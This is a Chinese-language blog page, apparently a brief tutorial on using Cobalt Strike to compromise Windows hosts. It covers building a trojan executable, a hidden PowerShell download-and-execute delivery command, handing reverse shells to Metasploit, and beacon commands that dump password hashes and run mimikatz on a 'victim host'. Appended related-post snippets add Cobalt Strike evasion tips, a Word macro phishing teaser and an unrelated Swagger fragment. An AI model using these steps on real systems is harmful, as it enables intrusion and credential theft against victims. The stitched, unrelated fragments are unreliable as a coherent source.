Cobalt Strike 簡單使用

2022-09-15 02:57:08 字數 1631 閱讀 4367

其中afanti就是密碼

使用者名稱隨意寫,密碼添afanti

attacks->packages->windows executable
選擇剛剛生成的listener,生成木馬到桌面。

雙擊artifact.exe木馬,客戶就能上線。

attacks->packages->payload generator
選擇一種語言生成payload

attacks->web drive-by->scripted web delivery
powershell.exe -nop -w hidden -c "iex ((new-object net.webclient).downloadstring(''))"
在cobalt strik中執行,先新增乙個監聽命令,名稱為:msf payload選擇:windows/foreign/reverse_tcp 監聽埠:4444

選擇剛剛建立的msf_litener

msf配置好在互動介面點選spawn就會把shell彈到msf上,shell彈回來

執行截圖命令

在view->screenshot檢視

beacon> sleep 0  //快速顯示結果

beacon> wdigest //讀取資訊

beacon>hashdump //讀取賬號hash密碼值,需要administer許可權,右擊受害者主機--access-hashdump

beacon> logonpasswords //執行mimikatz, 右擊受害者主機--access- run mimikatz

cobalt strike入門和防護

不要在cobalt strike中使用預設的https證書。1.1 如何使用自簽名證書見 0.0.0.0是cobalt strike dns beacon特徵。使用dns idle malleable c2選項將其更改為其他內容。編輯teamserver指令碼的最後一行,將埠從50050更改為其他內...

SpringBoot Swagger簡單使用

io.springfox springfox swagger2 2.9.2 io.springfox springfox swagger ui 2.9.2 import org.springframework.context.annotation.bean import org.springfram...

cobalt strike批量傳送釣魚郵件

這裡我們生成木馬可以用cs帶的hta office巨集 word巨集來使目標上線cs,這裡以word巨集病毒為例子。首先我們需要製作乙個word巨集病毒來進行遠控操作。在cobalt strike中,需要新建乙個監聽程式來進行監聽,如下圖 然後點選attacks packages ms office...